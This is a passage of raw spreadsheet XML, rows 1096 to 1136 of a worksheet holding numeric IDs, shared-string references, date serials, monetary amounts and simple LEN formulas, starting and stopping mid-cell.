      </c>
      <c r="H1096">
        <v>500</v>
      </c>
      <c r="I1096" t="s">
        <v>9550</v>
      </c>
      <c r="J1096" t="s">
        <v>9478</v>
      </c>
      <c r="K1096">
        <f>LEN(I1096)</f>
        <v>18</v>
      </c>
      <c r="L1096">
        <f>LEN(J1096)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1097" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1097">
        <v>16843</v>
      </c>
      <c r="B1097">
        <v>2355</v>
      </c>
      <c r="C1097" t="s">
        <v>16354</v>
      </c>
      <c r="D1097" t="s">
        <v>16355</v>
      </c>
      <c r="E1097">
        <v>26</v>
      </c>
      <c r="F1097" t="s">
        <v>364</v>
      </c>
      <c r="G1097" s="1">
        <v>43839</v>
      </c>
      <c r="H1097" s="4">
        <v>3092591000</v>
      </c>
      <c r="I1097" t="s">
        <v>9506</v>
      </c>
      <c r="J1097" t="s">
        <v>9456</v>
      </c>
      <c r="K1097">
        <f>LEN(I1097)</f>
        <v>17</v>
      </c>
      <c r="L1097">
        <f>LEN(J1097)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1098" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1098">
        <v>19424</v>
      </c>
      <c r="B1098">
        <v>2561</v>
      </c>
      <c r="C1098" t="s">
        <v>5109</v>
      </c>
      <c r="D1098" t="s">
        <v>10026</v>
      </c>
      <c r="E1098">
        <v>26</v>
      </c>
      <c r="F1098" t="s">
        <v>364</v>
      </c>
      <c r="G1098" s="1">
        <v>43860</v>
      </c>
      <c r="H1098">
        <v>3000000</v>
      </c>
      <c r="I1098" t="s">
        <v>9506</v>
      </c>
      <c r="J1098" t="s">
        <v>9456</v>
      </c>
      <c r="K1098">
        <f>LEN(I1098)</f>
        <v>17</v>
      </c>
      <c r="L1098">
        <f>LEN(J1098)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1099" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1099">
        <v>19982</v>
      </c>
      <c r="B1099">
        <v>2607</v>
      </c>
      <c r="C1099" t="s">
        <v>4180</v>
      </c>
      <c r="D1099" t="s">
        <v>10371</v>
      </c>
      <c r="E1099">
        <v>26</v>
      </c>
      <c r="F1099" t="s">
        <v>364</v>
      </c>
      <c r="G1099" s="1">
        <v>43899</v>
      </c>
      <c r="H1099">
        <v>2400</v>
      </c>
      <c r="I1099" t="s">
        <v>9506</v>
      </c>
      <c r="J1099" t="s">
        <v>9456</v>
      </c>
      <c r="K1099">
        <f>LEN(I1099)</f>
        <v>17</v>
      </c>
      <c r="L1099">
        <f>LEN(J1099)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1100" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1100">
        <v>21090</v>
      </c>
      <c r="B1100">
        <v>210</v>
      </c>
      <c r="C1100" t="s">
        <v>1485</v>
      </c>
      <c r="D1100" t="s">
        <v>11130</v>
      </c>
      <c r="E1100">
        <v>13</v>
      </c>
      <c r="F1100" t="s">
        <v>2236</v>
      </c>
      <c r="G1100" s="1">
        <v>44090</v>
      </c>
      <c r="H1100">
        <v>3000</v>
      </c>
      <c r="I1100" t="s">
        <v>11131</v>
      </c>
      <c r="J1100" t="s">
        <v>9478</v>
      </c>
      <c r="K1100">
        <f>LEN(I1100)</f>
        <v>16</v>
      </c>
      <c r="L1100">
        <f>LEN(J1100)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1101" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1101">
        <v>21147</v>
      </c>
      <c r="B1101">
        <v>990</v>
      </c>
      <c r="C1101" t="s">
        <v>2847</v>
      </c>
      <c r="D1101" t="s">
        <v>11171</v>
      </c>
      <c r="E1101">
        <v>9</v>
      </c>
      <c r="F1101" t="s">
        <v>11172</v>
      </c>
      <c r="G1101" s="1">
        <v>44088</v>
      </c>
      <c r="H1101">
        <v>5000</v>
      </c>
      <c r="I1101" t="s">
        <v>10448</v>
      </c>
      <c r="J1101" t="s">
        <v>9456</v>
      </c>
      <c r="K1101">
        <f>LEN(I1101)</f>
        <v>14</v>
      </c>
      <c r="L1101">
        <f>LEN(J1101)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1102" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1102">
        <v>16699</v>
      </c>
      <c r="B1102">
        <v>1733</v>
      </c>
      <c r="C1102" t="s">
        <v>6649</v>
      </c>
      <c r="D1102" t="s">
        <v>9473</v>
      </c>
      <c r="E1102">
        <v>14</v>
      </c>
      <c r="F1102" t="s">
        <v>9476</v>
      </c>
      <c r="G1102" s="1">
        <v>43896</v>
      </c>
      <c r="H1102">
        <v>1000</v>
      </c>
      <c r="I1102" t="s">
        <v>9477</v>
      </c>
      <c r="J1102" t="s">
        <v>9478</v>
      </c>
      <c r="K1102">
        <f>LEN(I1102)</f>
        <v>13</v>
      </c>
      <c r="L1102">
        <f>LEN(J1102)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1103" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1103">
        <v>16872</v>
      </c>
      <c r="B1103">
        <v>2143</v>
      </c>
      <c r="C1103" t="s">
        <v>16356</v>
      </c>
      <c r="D1103" t="s">
        <v>16357</v>
      </c>
      <c r="E1103">
        <v>2</v>
      </c>
      <c r="F1103" t="s">
        <v>9441</v>
      </c>
      <c r="G1103" s="1">
        <v>43959</v>
      </c>
      <c r="H1103" s="4">
        <v>10000</v>
      </c>
      <c r="I1103" t="s">
        <v>9536</v>
      </c>
      <c r="J1103" t="s">
        <v>9456</v>
      </c>
      <c r="K1103">
        <f>LEN(I1103)</f>
        <v>13</v>
      </c>
      <c r="L1103">
        <f>LEN(J1103)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1104" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1104">
        <v>16873</v>
      </c>
      <c r="B1104">
        <v>2143</v>
      </c>
      <c r="C1104" t="s">
        <v>16356</v>
      </c>
      <c r="D1104" t="s">
        <v>16357</v>
      </c>
      <c r="E1104">
        <v>2</v>
      </c>
      <c r="F1104" t="s">
        <v>9437</v>
      </c>
      <c r="G1104" s="1">
        <v>43959</v>
      </c>
      <c r="H1104" s="4">
        <v>20000</v>
      </c>
      <c r="I1104" t="s">
        <v>9536</v>
      </c>
      <c r="J1104" t="s">
        <v>9456</v>
      </c>
      <c r="K1104">
        <f>LEN(I1104)</f>
        <v>13</v>
      </c>
      <c r="L1104">
        <f>LEN(J1104)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1105" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1105">
        <v>17454</v>
      </c>
      <c r="B1105">
        <v>2051</v>
      </c>
      <c r="C1105" t="s">
        <v>5476</v>
      </c>
      <c r="D1105" t="s">
        <v>9793</v>
      </c>
      <c r="E1105">
        <v>16</v>
      </c>
      <c r="F1105" t="s">
        <v>9437</v>
      </c>
      <c r="G1105" s="1">
        <v>43871</v>
      </c>
      <c r="H1105">
        <v>120000</v>
      </c>
      <c r="I1105" t="s">
        <v>9536</v>
      </c>
      <c r="J1105" t="s">
        <v>9456</v>
      </c>
      <c r="K1105">
        <f>LEN(I1105)</f>
        <v>13</v>
      </c>
      <c r="L1105">
        <f>LEN(J1105)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1106" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1106">
        <v>18187</v>
      </c>
      <c r="B1106">
        <v>215</v>
      </c>
      <c r="C1106" t="s">
        <v>510</v>
      </c>
      <c r="D1106" t="s">
        <v>9833</v>
      </c>
      <c r="E1106">
        <v>12</v>
      </c>
      <c r="F1106" t="s">
        <v>512</v>
      </c>
      <c r="G1106" s="1">
        <v>44053</v>
      </c>
      <c r="H1106">
        <v>30000</v>
      </c>
      <c r="I1106" t="s">
        <v>9746</v>
      </c>
      <c r="J1106" t="s">
        <v>9456</v>
      </c>
      <c r="K1106">
        <f>LEN(I1106)</f>
        <v>13</v>
      </c>
      <c r="L1106">
        <f>LEN(J1106)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1107" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1107">
        <v>19376</v>
      </c>
      <c r="B1107">
        <v>2236</v>
      </c>
      <c r="C1107" t="s">
        <v>5023</v>
      </c>
      <c r="D1107" t="s">
        <v>9978</v>
      </c>
      <c r="E1107">
        <v>11</v>
      </c>
      <c r="F1107" t="s">
        <v>5434</v>
      </c>
      <c r="G1107" s="1">
        <v>43881</v>
      </c>
      <c r="H1107">
        <v>150000</v>
      </c>
      <c r="I1107" t="s">
        <v>9746</v>
      </c>
      <c r="J1107" t="s">
        <v>9456</v>
      </c>
      <c r="K1107">
        <f>LEN(I1107)</f>
        <v>13</v>
      </c>
      <c r="L1107">
        <f>LEN(J1107)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1108" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1108">
        <v>19377</v>
      </c>
      <c r="B1108">
        <v>2236</v>
      </c>
      <c r="C1108" t="s">
        <v>5023</v>
      </c>
      <c r="D1108" t="s">
        <v>9978</v>
      </c>
      <c r="E1108">
        <v>11</v>
      </c>
      <c r="F1108" t="s">
        <v>9217</v>
      </c>
      <c r="G1108" s="1">
        <v>43881</v>
      </c>
      <c r="H1108">
        <v>250000</v>
      </c>
      <c r="I1108" t="s">
        <v>9746</v>
      </c>
      <c r="J1108" t="s">
        <v>9456</v>
      </c>
      <c r="K1108">
        <f>LEN(I1108)</f>
        <v>13</v>
      </c>
      <c r="L1108">
        <f>LEN(J1108)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1109" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1109">
        <v>19410</v>
      </c>
      <c r="B1109">
        <v>2236</v>
      </c>
      <c r="C1109" t="s">
        <v>5023</v>
      </c>
      <c r="D1109" t="s">
        <v>9978</v>
      </c>
      <c r="E1109">
        <v>11</v>
      </c>
      <c r="F1109" t="s">
        <v>9454</v>
      </c>
      <c r="G1109" s="1">
        <v>43881</v>
      </c>
      <c r="H1109">
        <v>200000</v>
      </c>
      <c r="I1109" t="s">
        <v>9746</v>
      </c>
      <c r="J1109" t="s">
        <v>9456</v>
      </c>
      <c r="K1109">
        <f>LEN(I1109)</f>
        <v>13</v>
      </c>
      <c r="L1109">
        <f>LEN(J1109)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1110" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1110">
        <v>19815</v>
      </c>
      <c r="B1110">
        <v>2574</v>
      </c>
      <c r="C1110" t="s">
        <v>5271</v>
      </c>
      <c r="D1110" t="s">
        <v>10259</v>
      </c>
      <c r="E1110">
        <v>12</v>
      </c>
      <c r="F1110" t="s">
        <v>9469</v>
      </c>
      <c r="G1110" s="1">
        <v>44074</v>
      </c>
      <c r="H1110">
        <v>200000</v>
      </c>
      <c r="I1110" t="s">
        <v>9536</v>
      </c>
      <c r="J1110" t="s">
        <v>9456</v>
      </c>
      <c r="K1110">
        <f>LEN(I1110)</f>
        <v>13</v>
      </c>
      <c r="L1110">
        <f>LEN(J1110)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1111" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1111">
        <v>19817</v>
      </c>
      <c r="B1111">
        <v>2574</v>
      </c>
      <c r="C1111" t="s">
        <v>5271</v>
      </c>
      <c r="D1111" t="s">
        <v>10259</v>
      </c>
      <c r="E1111">
        <v>12</v>
      </c>
      <c r="F1111" t="s">
        <v>10260</v>
      </c>
      <c r="G1111" s="1">
        <v>44074</v>
      </c>
      <c r="H1111">
        <v>100000</v>
      </c>
      <c r="I1111" t="s">
        <v>9536</v>
      </c>
      <c r="J1111" t="s">
        <v>9456</v>
      </c>
      <c r="K1111">
        <f>LEN(I1111)</f>
        <v>13</v>
      </c>
      <c r="L1111">
        <f>LEN(J1111)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1112" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1112">
        <v>19996</v>
      </c>
      <c r="B1112">
        <v>1262</v>
      </c>
      <c r="C1112" t="s">
        <v>2838</v>
      </c>
      <c r="D1112" t="s">
        <v>10389</v>
      </c>
      <c r="E1112">
        <v>17</v>
      </c>
      <c r="F1112" t="s">
        <v>9453</v>
      </c>
      <c r="G1112" s="1">
        <v>43934</v>
      </c>
      <c r="H1112">
        <v>1000</v>
      </c>
      <c r="I1112" t="s">
        <v>9746</v>
      </c>
      <c r="J1112" t="s">
        <v>9456</v>
      </c>
      <c r="K1112">
        <f>LEN(I1112)</f>
        <v>13</v>
      </c>
      <c r="L1112">
        <f>LEN(J1112)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1113" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1113">
        <v>19997</v>
      </c>
      <c r="B1113">
        <v>1262</v>
      </c>
      <c r="C1113" t="s">
        <v>2838</v>
      </c>
      <c r="D1113" t="s">
        <v>10389</v>
      </c>
      <c r="E1113">
        <v>17</v>
      </c>
      <c r="F1113" t="s">
        <v>547</v>
      </c>
      <c r="G1113" s="1">
        <v>43934</v>
      </c>
      <c r="H1113">
        <v>200</v>
      </c>
      <c r="I1113" t="s">
        <v>9746</v>
      </c>
      <c r="J1113" t="s">
        <v>9456</v>
      </c>
      <c r="K1113">
        <f>LEN(I1113)</f>
        <v>13</v>
      </c>
      <c r="L1113">
        <f>LEN(J1113)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1114" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1114">
        <v>19998</v>
      </c>
      <c r="B1114">
        <v>1262</v>
      </c>
      <c r="C1114" t="s">
        <v>2838</v>
      </c>
      <c r="D1114" t="s">
        <v>10389</v>
      </c>
      <c r="E1114">
        <v>17</v>
      </c>
      <c r="F1114" t="s">
        <v>10390</v>
      </c>
      <c r="G1114" s="1">
        <v>43934</v>
      </c>
      <c r="H1114">
        <v>200</v>
      </c>
      <c r="I1114" t="s">
        <v>9746</v>
      </c>
      <c r="J1114" t="s">
        <v>9456</v>
      </c>
      <c r="K1114">
        <f>LEN(I1114)</f>
        <v>13</v>
      </c>
      <c r="L1114">
        <f>LEN(J1114)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1115" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1115">
        <v>20262</v>
      </c>
      <c r="B1115">
        <v>2574</v>
      </c>
      <c r="C1115" t="s">
        <v>5271</v>
      </c>
      <c r="D1115" t="s">
        <v>10259</v>
      </c>
      <c r="E1115">
        <v>12</v>
      </c>
      <c r="F1115" t="s">
        <v>10587</v>
      </c>
      <c r="G1115" s="1">
        <v>44074</v>
      </c>
      <c r="H1115">
        <v>100000</v>
      </c>
      <c r="I1115" t="s">
        <v>9536</v>
      </c>
      <c r="J1115" t="s">
        <v>9456</v>
      </c>
      <c r="K1115">
        <f>LEN(I1115)</f>
        <v>13</v>
      </c>
      <c r="L1115">
        <f>LEN(J1115)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1116" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1116">
        <v>20568</v>
      </c>
      <c r="B1116">
        <v>2769</v>
      </c>
      <c r="C1116" t="s">
        <v>6962</v>
      </c>
      <c r="D1116" t="s">
        <v>10816</v>
      </c>
      <c r="E1116">
        <v>25</v>
      </c>
      <c r="F1116" t="s">
        <v>10818</v>
      </c>
      <c r="G1116" s="1">
        <v>43959</v>
      </c>
      <c r="H1116">
        <v>0</v>
      </c>
      <c r="I1116" t="s">
        <v>9536</v>
      </c>
      <c r="J1116" t="s">
        <v>9456</v>
      </c>
      <c r="K1116">
        <f>LEN(I1116)</f>
        <v>13</v>
      </c>
      <c r="L1116">
        <f>LEN(J1116)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1117" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1117">
        <v>20569</v>
      </c>
      <c r="B1117">
        <v>2769</v>
      </c>
      <c r="C1117" t="s">
        <v>6962</v>
      </c>
      <c r="D1117" t="s">
        <v>10816</v>
      </c>
      <c r="E1117">
        <v>25</v>
      </c>
      <c r="F1117" t="s">
        <v>10819</v>
      </c>
      <c r="G1117" s="1">
        <v>43959</v>
      </c>
      <c r="H1117">
        <v>0</v>
      </c>
      <c r="I1117" t="s">
        <v>9536</v>
      </c>
      <c r="J1117" t="s">
        <v>9456</v>
      </c>
      <c r="K1117">
        <f>LEN(I1117)</f>
        <v>13</v>
      </c>
      <c r="L1117">
        <f>LEN(J1117)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1118" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1118">
        <v>20570</v>
      </c>
      <c r="B1118">
        <v>2769</v>
      </c>
      <c r="C1118" t="s">
        <v>6962</v>
      </c>
      <c r="D1118" t="s">
        <v>10816</v>
      </c>
      <c r="E1118">
        <v>25</v>
      </c>
      <c r="F1118" t="s">
        <v>10820</v>
      </c>
      <c r="G1118" s="1">
        <v>43959</v>
      </c>
      <c r="H1118">
        <v>0</v>
      </c>
      <c r="I1118" t="s">
        <v>9536</v>
      </c>
      <c r="J1118" t="s">
        <v>9456</v>
      </c>
      <c r="K1118">
        <f>LEN(I1118)</f>
        <v>13</v>
      </c>
      <c r="L1118">
        <f>LEN(J1118)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1119" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1119">
        <v>20636</v>
      </c>
      <c r="B1119">
        <v>1852</v>
      </c>
      <c r="C1119" t="s">
        <v>16358</v>
      </c>
      <c r="D1119" t="s">
        <v>16359</v>
      </c>
      <c r="E1119">
        <v>19</v>
      </c>
      <c r="F1119" t="s">
        <v>364</v>
      </c>
      <c r="G1119" s="1">
        <v>43959</v>
      </c>
      <c r="H1119">
        <v>1257115.75</v>
      </c>
      <c r="I1119" t="s">
        <v>9536</v>
      </c>
      <c r="J1119" t="s">
        <v>9456</v>
      </c>
      <c r="K1119">
        <f>LEN(I1119)</f>
        <v>13</v>
      </c>
      <c r="L1119">
        <f>LEN(J1119)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1120" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1120">
        <v>20804</v>
      </c>
      <c r="B1120">
        <v>420</v>
      </c>
      <c r="C1120" t="s">
        <v>897</v>
      </c>
      <c r="D1120" t="s">
        <v>10990</v>
      </c>
      <c r="E1120">
        <v>29</v>
      </c>
      <c r="F1120" t="s">
        <v>4686</v>
      </c>
      <c r="G1120" s="1">
        <v>43971</v>
      </c>
      <c r="H1120">
        <v>120000</v>
      </c>
      <c r="I1120" t="s">
        <v>10991</v>
      </c>
      <c r="J1120" t="s">
        <v>9478</v>
      </c>
      <c r="K1120">
        <f>LEN(I1120)</f>
        <v>11</v>
      </c>
      <c r="L1120">
        <f>LEN(J1120)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1121" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1121">
        <v>16664</v>
      </c>
      <c r="B1121">
        <v>1222</v>
      </c>
      <c r="C1121" t="s">
        <v>3225</v>
      </c>
      <c r="D1121" t="s">
        <v>9452</v>
      </c>
      <c r="E1121">
        <v>11</v>
      </c>
      <c r="F1121" t="s">
        <v>9455</v>
      </c>
      <c r="G1121" s="1">
        <v>44022</v>
      </c>
      <c r="H1121">
        <v>95000</v>
      </c>
      <c r="J1121" t="s">
        <v>9456</v>
      </c>
      <c r="K1121">
        <f>LEN(I1121)</f>
        <v>0</v>
      </c>
      <c r="L1121">
        <f>LEN(J1121)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1122" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1122">
        <v>16667</v>
      </c>
      <c r="B1122">
        <v>1222</v>
      </c>
      <c r="C1122" t="s">
        <v>3225</v>
      </c>
      <c r="D1122" t="s">
        <v>9452</v>
      </c>
      <c r="E1122">
        <v>11</v>
      </c>
      <c r="F1122" t="s">
        <v>9458</v>
      </c>
      <c r="G1122" s="1">
        <v>44022</v>
      </c>
      <c r="H1122">
        <v>95000</v>
      </c>
      <c r="J1122" t="s">
        <v>9456</v>
      </c>
      <c r="K1122">
        <f>LEN(I1122)</f>
        <v>0</v>
      </c>
      <c r="L1122">
        <f>LEN(J1122)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1123" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1123">
        <v>16668</v>
      </c>
      <c r="B1123">
        <v>1222</v>
      </c>
      <c r="C1123" t="s">
        <v>3225</v>
      </c>
      <c r="D1123" t="s">
        <v>9452</v>
      </c>
      <c r="E1123">
        <v>11</v>
      </c>
      <c r="F1123" t="s">
        <v>9459</v>
      </c>
      <c r="G1123" s="1">
        <v>44022</v>
      </c>
      <c r="H1123">
        <v>95000</v>
      </c>
      <c r="J1123" t="s">
        <v>9456</v>
      </c>
      <c r="K1123">
        <f>LEN(I1123)</f>
        <v>0</v>
      </c>
      <c r="L1123">
        <f>LEN(J1123)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1124" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1124">
        <v>16671</v>
      </c>
      <c r="B1124">
        <v>1222</v>
      </c>
      <c r="C1124" t="s">
        <v>3225</v>
      </c>
      <c r="D1124" t="s">
        <v>9452</v>
      </c>
      <c r="E1124">
        <v>11</v>
      </c>
      <c r="F1124" t="s">
        <v>9437</v>
      </c>
      <c r="G1124" s="1">
        <v>44022</v>
      </c>
      <c r="H1124">
        <v>95000</v>
      </c>
      <c r="J1124" t="s">
        <v>9456</v>
      </c>
      <c r="K1124">
        <f>LEN(I1124)</f>
        <v>0</v>
      </c>
      <c r="L1124">
        <f>LEN(J1124)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1125" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1125">
        <v>16673</v>
      </c>
      <c r="B1125">
        <v>1222</v>
      </c>
      <c r="C1125" t="s">
        <v>3225</v>
      </c>
      <c r="D1125" t="s">
        <v>9452</v>
      </c>
      <c r="E1125">
        <v>11</v>
      </c>
      <c r="F1125" t="s">
        <v>9461</v>
      </c>
      <c r="G1125" s="1">
        <v>44022</v>
      </c>
      <c r="H1125">
        <v>100000</v>
      </c>
      <c r="J1125" t="s">
        <v>9456</v>
      </c>
      <c r="K1125">
        <f>LEN(I1125)</f>
        <v>0</v>
      </c>
      <c r="L1125">
        <f>LEN(J1125)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1126" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1126">
        <v>16674</v>
      </c>
      <c r="B1126">
        <v>1222</v>
      </c>
      <c r="C1126" t="s">
        <v>3225</v>
      </c>
      <c r="D1126" t="s">
        <v>9452</v>
      </c>
      <c r="E1126">
        <v>11</v>
      </c>
      <c r="F1126" t="s">
        <v>9462</v>
      </c>
      <c r="G1126" s="1">
        <v>44022</v>
      </c>
      <c r="H1126">
        <v>100000</v>
      </c>
      <c r="J1126" t="s">
        <v>9456</v>
      </c>
      <c r="K1126">
        <f>LEN(I1126)</f>
        <v>0</v>
      </c>
      <c r="L1126">
        <f>LEN(J1126)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1127" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1127">
        <v>16710</v>
      </c>
      <c r="B1127">
        <v>2016</v>
      </c>
      <c r="C1127" t="s">
        <v>5283</v>
      </c>
      <c r="D1127" t="s">
        <v>9488</v>
      </c>
      <c r="E1127">
        <v>14</v>
      </c>
      <c r="F1127" t="s">
        <v>9489</v>
      </c>
      <c r="G1127" s="1">
        <v>43864</v>
      </c>
      <c r="H1127">
        <v>500000</v>
      </c>
      <c r="J1127" t="s">
        <v>9478</v>
      </c>
      <c r="K1127">
        <f>LEN(I1127)</f>
        <v>0</v>
      </c>
      <c r="L1127">
        <f>LEN(J1127)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1128" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1128">
        <v>16716</v>
      </c>
      <c r="B1128">
        <v>2016</v>
      </c>
      <c r="C1128" t="s">
        <v>5283</v>
      </c>
      <c r="D1128" t="s">
        <v>9488</v>
      </c>
      <c r="E1128">
        <v>14</v>
      </c>
      <c r="F1128" t="s">
        <v>1746</v>
      </c>
      <c r="G1128" s="1">
        <v>43864</v>
      </c>
      <c r="H1128">
        <v>300000</v>
      </c>
      <c r="J1128" t="s">
        <v>9478</v>
      </c>
      <c r="K1128">
        <f>LEN(I1128)</f>
        <v>0</v>
      </c>
      <c r="L1128">
        <f>LEN(J1128)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1129" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1129">
        <v>16720</v>
      </c>
      <c r="B1129">
        <v>2016</v>
      </c>
      <c r="C1129" t="s">
        <v>5283</v>
      </c>
      <c r="D1129" t="s">
        <v>9488</v>
      </c>
      <c r="E1129">
        <v>14</v>
      </c>
      <c r="F1129" t="s">
        <v>9437</v>
      </c>
      <c r="G1129" s="1">
        <v>43864</v>
      </c>
      <c r="H1129">
        <v>100000</v>
      </c>
      <c r="J1129" t="s">
        <v>9478</v>
      </c>
      <c r="K1129">
        <f>LEN(I1129)</f>
        <v>0</v>
      </c>
      <c r="L1129">
        <f>LEN(J1129)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1130" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1130">
        <v>16848</v>
      </c>
      <c r="B1130">
        <v>88</v>
      </c>
      <c r="C1130" t="s">
        <v>73</v>
      </c>
      <c r="D1130" t="s">
        <v>9516</v>
      </c>
      <c r="E1130">
        <v>14</v>
      </c>
      <c r="F1130" t="s">
        <v>9517</v>
      </c>
      <c r="G1130" s="1">
        <v>43873</v>
      </c>
      <c r="H1130">
        <v>26238</v>
      </c>
      <c r="J1130" t="s">
        <v>9456</v>
      </c>
      <c r="K1130">
        <f>LEN(I1130)</f>
        <v>0</v>
      </c>
      <c r="L1130">
        <f>LEN(J1130)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1131" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1131">
        <v>16885</v>
      </c>
      <c r="B1131">
        <v>943</v>
      </c>
      <c r="C1131" t="s">
        <v>2517</v>
      </c>
      <c r="D1131" t="s">
        <v>9545</v>
      </c>
      <c r="E1131">
        <v>13</v>
      </c>
      <c r="F1131" t="s">
        <v>9546</v>
      </c>
      <c r="G1131" s="1">
        <v>44067</v>
      </c>
      <c r="H1131">
        <v>300000</v>
      </c>
      <c r="J1131" t="s">
        <v>9456</v>
      </c>
      <c r="K1131">
        <f>LEN(I1131)</f>
        <v>0</v>
      </c>
      <c r="L1131">
        <f>LEN(J1131)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1132" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1132">
        <v>16949</v>
      </c>
      <c r="B1132">
        <v>2308</v>
      </c>
      <c r="C1132" t="s">
        <v>5579</v>
      </c>
      <c r="D1132" t="s">
        <v>9584</v>
      </c>
      <c r="E1132">
        <v>29</v>
      </c>
      <c r="F1132" t="s">
        <v>9585</v>
      </c>
      <c r="G1132" s="1">
        <v>43858</v>
      </c>
      <c r="H1132">
        <v>0</v>
      </c>
      <c r="J1132" t="s">
        <v>9478</v>
      </c>
      <c r="K1132">
        <f>LEN(I1132)</f>
        <v>0</v>
      </c>
      <c r="L1132">
        <f>LEN(J1132)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1133" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1133">
        <v>16950</v>
      </c>
      <c r="B1133">
        <v>2308</v>
      </c>
      <c r="C1133" t="s">
        <v>5579</v>
      </c>
      <c r="D1133" t="s">
        <v>9584</v>
      </c>
      <c r="E1133">
        <v>29</v>
      </c>
      <c r="F1133" t="s">
        <v>9586</v>
      </c>
      <c r="G1133" s="1">
        <v>43858</v>
      </c>
      <c r="H1133">
        <v>0</v>
      </c>
      <c r="J1133" t="s">
        <v>9478</v>
      </c>
      <c r="K1133">
        <f>LEN(I1133)</f>
        <v>0</v>
      </c>
      <c r="L1133">
        <f>LEN(J1133)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1134" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1134">
        <v>16978</v>
      </c>
      <c r="B1134">
        <v>2346</v>
      </c>
      <c r="C1134" t="s">
        <v>5926</v>
      </c>
      <c r="D1134" t="s">
        <v>9597</v>
      </c>
      <c r="E1134">
        <v>14</v>
      </c>
      <c r="F1134" t="s">
        <v>9598</v>
      </c>
      <c r="G1134" s="1">
        <v>43924</v>
      </c>
      <c r="H1134">
        <v>12000</v>
      </c>
      <c r="J1134" t="s">
        <v>9478</v>
      </c>
      <c r="K1134">
        <f>LEN(I1134)</f>
        <v>0</v>
      </c>
      <c r="L1134">
        <f>LEN(J1134)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1135" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1135">
        <v>16979</v>
      </c>
      <c r="B1135">
        <v>2346</v>
      </c>
      <c r="C1135" t="s">
        <v>5926</v>
      </c>
      <c r="D1135" t="s">
        <v>9597</v>
      </c>
      <c r="E1135">
        <v>14</v>
      </c>
      <c r="F1135" t="s">
        <v>6513</v>
      </c>
      <c r="G1135" s="1">
        <v>43924</v>
      </c>
      <c r="H1135">
        <v>120000</v>
      </c>
      <c r="J1135" t="s">
        <v>9478</v>
      </c>
      <c r="K1135">
        <f>LEN(I1135)</f>
        <v>0</v>
      </c>
      <c r="L1135">
        <f>LEN(J1135)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1136" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1136">
        <v>17010</v>
      </c>
      <c r="B1136">
        <v>1444</v>
      </c>
      <c r="C1136" t="s">
